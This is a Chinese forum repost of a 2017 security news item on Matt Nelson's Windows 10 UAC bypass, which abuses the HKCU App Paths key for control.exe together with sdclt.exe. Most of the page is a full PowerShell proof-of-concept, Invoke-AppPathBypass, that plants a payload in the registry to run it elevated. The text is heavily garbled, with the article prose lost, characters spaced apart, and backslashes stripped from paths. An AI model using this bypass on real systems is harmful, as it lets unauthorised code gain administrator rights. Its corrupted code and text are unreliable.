搜索

[3652] 2017-03-22_研究人员利用应用程序路径绕过Windows10中的UAC机制

文档创建者:s7ckTeam
浏览次数:27
最后更新:2025-01-16
2017-03-22_研究人员利用应用程序路径绕过Windows10中的UAC机制 W i n d o w s   1 0 U A C   E   E   2 0 1 7 - 0 3 - 2 2 E 3 2 2   M a t t   N e l s o n A p p   P a t h s W i n d o w s   1 0 U A C I F i l e O p e r a t i o n / D L L N e l s o n I F i l e O p e r a t i o n / E L L W i n d o w s   1 0   b u i l d   1 5 0 3 1 N e l s o n s d c l t . e x e W i n d o w s s d c l t . e x e W i n d o w s   1 0 s d c l t . e x e c o n t r o l . e x e H K E Y _ C U R R E N T _ U S E R   A p p   P a t h c o n t r o l . e x e N e l s o n s d c l t . e x e H K E Y _ C U R R E N T _ U S E R   h i v e c o n t r o l . e x e A p p   P a t h H K E Y _ C U R R E N T _ U S E R H K C U
s d c l t . e x e c m d . e x e 使 N e l s o n C : W i n d o w s S y s t e m 3 2 c m d . e x e   / c   c a l c . e x e S h e l l E x e c u t e I n f o I p F i l e S h e l l E x e c u t e E x U A C P o C f u n c t i o n   I n v o k e - A p p P a t h B y p a s s {         [ C m d l e t B i n d i n g ( S u p p o r t s S h o u l d P r o c e s s   =   $ T r u e ,   C o n f i r m I m p a c t   =   ' M e d i u m ' ) ]         P a r a m   (                 [ P a r a m e t e r ( M a n d a t o r y   =   $ T r u e ) ]                 [ V a l i d a t e N o t N u l l O r E m p t y ( ) ]                 [ S t r i n g ]                 $ P a y l o a d ,                 [ S w i t c h ]                 $ F o r c e         )         $ C o n s e n t P r o m p t   =   ( G e t - I t e m P r o p e r t y   H K L M : S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n P o l i c i e s S y s t e m ) . C o n s e n t P r o m p t B e h a v i o r A d m i n         $ S e c u r e D e s k t o p P r o m p t   =   ( G e t - I t e m P r o p e r t y   H K L M : S O F T W A R E M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n P o l i c i e s S y s t e m ) . P r o m p t O n S e c u r e D e s k t o p         i f ( $ C o n s e n t P r o m p t   - E q   2   - A n d   $ S e c u r e D e s k t o p P r o m p t   - E q   1 ) {                 " U A C   i s   s e t   t o   ' A l w a y s   N o t i f y ' .   T h i s   m o d u l e   d o e s   n o t   b y p a s s   t h i s   s e t t i n g . "                 e x i t         }         e l s e {
                # B e g i n   E x e c u t i o n                 $ A p p P a t h   =   " H K C U : S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n A p p   P a t h s c o n t r o l . e x e "                 i f   ( $ F o r c e   - o r   ( ( G e t - I t e m P r o p e r t y   - P a t h   $ A p p P a t h   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e )   - e q   $ n u l l ) ) {                         N e w - I t e m   $ A p p P a t h   - F o r c e   |                                 N e w - I t e m P r o p e r t y   - N a m e   ' ( d e f a u l t ) '   - V a l u e   $ P a y l o a d   - P r o p e r t y T y p e   s t r i n g   - F o r c e   |   O u t - N u l l                 } e l s e {                         W r i t e - W a r n i n g   " K e y   a l r e a d y   e x i s t s ,   c o n s i d e r   u s i n g   - F o r c e "                         e x i t                 }                 i f   ( T e s t - P a t h   $ A p p P a t h )   {                         W r i t e - V e r b o s e   " C r e a t e d   r e g i s t r y   e n t r i e s   f o r   c o n t r o l . e x e   A p p   P a t h "                 } e l s e {                         W r i t e - W a r n i n g   " F a i l e d   t o   c r e a t e   r e g i s t r y   k e y ,   e x i t i n g "                         e x i t                 }                 $ s d c l t P a t h   =   J o i n - P a t h   - P a t h   ( [ E n v i r o n m e n t ] : : G e t F o l d e r P a t h ( ' S y s t e m ' ) )   - C h i l d P a t h   ' s d c l t . e x e '                 i f   ( $ P S C m d l e t . S h o u l d P r o c e s s ( $ s d c l t P a t h ,   ' S t a r t   p r o c e s s ' ) )   {                         $ P r o c e s s   =   S t a r t - P r o c e s s   - F i l e P a t h   $ s d c l t P a t h     - P a s s T h r u                         W r i t e - V e r b o s e   " S t a r t e d   s d c l t . e x e "                 }                 # S l e e p   5   s e c o n d s                   W r i t e - V e r b o s e   " S l e e p i n g   5   s e c o n d s   t o   t r i g g e r   p a y l o a d "                 i f   ( - n o t   $ P S B o u n d P a r a m e t e r s [ ' W h a t I f ' ] )   {                         S t a r t - S l e e p   - S e c o n d s   5                 }                 i f   ( T e s t - P a t h   $ A p p P a t h )   {                         # R e m o v e   t h e   r e g i s t r y   e n t r y                         R e m o v e - I t e m   $ A p p P a t h   - R e c u r s e   - F o r c e                         W r i t e - V e r b o s e   " R e m o v e d   r e g i s t r y   e n t r i e s "                 }                 i f ( G e t - P r o c e s s   - I d   $ P r o c e s s . I d   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e ) {                         S t o p - P r o c e s s   - I d   $ P r o c e s s . I d                         W r i t e - V e r b o s e   " K i l l e d   r u n n i n g   s d c l t   p r o c e s s "                 }         } } E E   z h u - g e l i a n g   e a p p @ e a s y a q . c o m @ E 沿 E
E A Q a p p E w w w . e a s y a q . c o m   ,  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理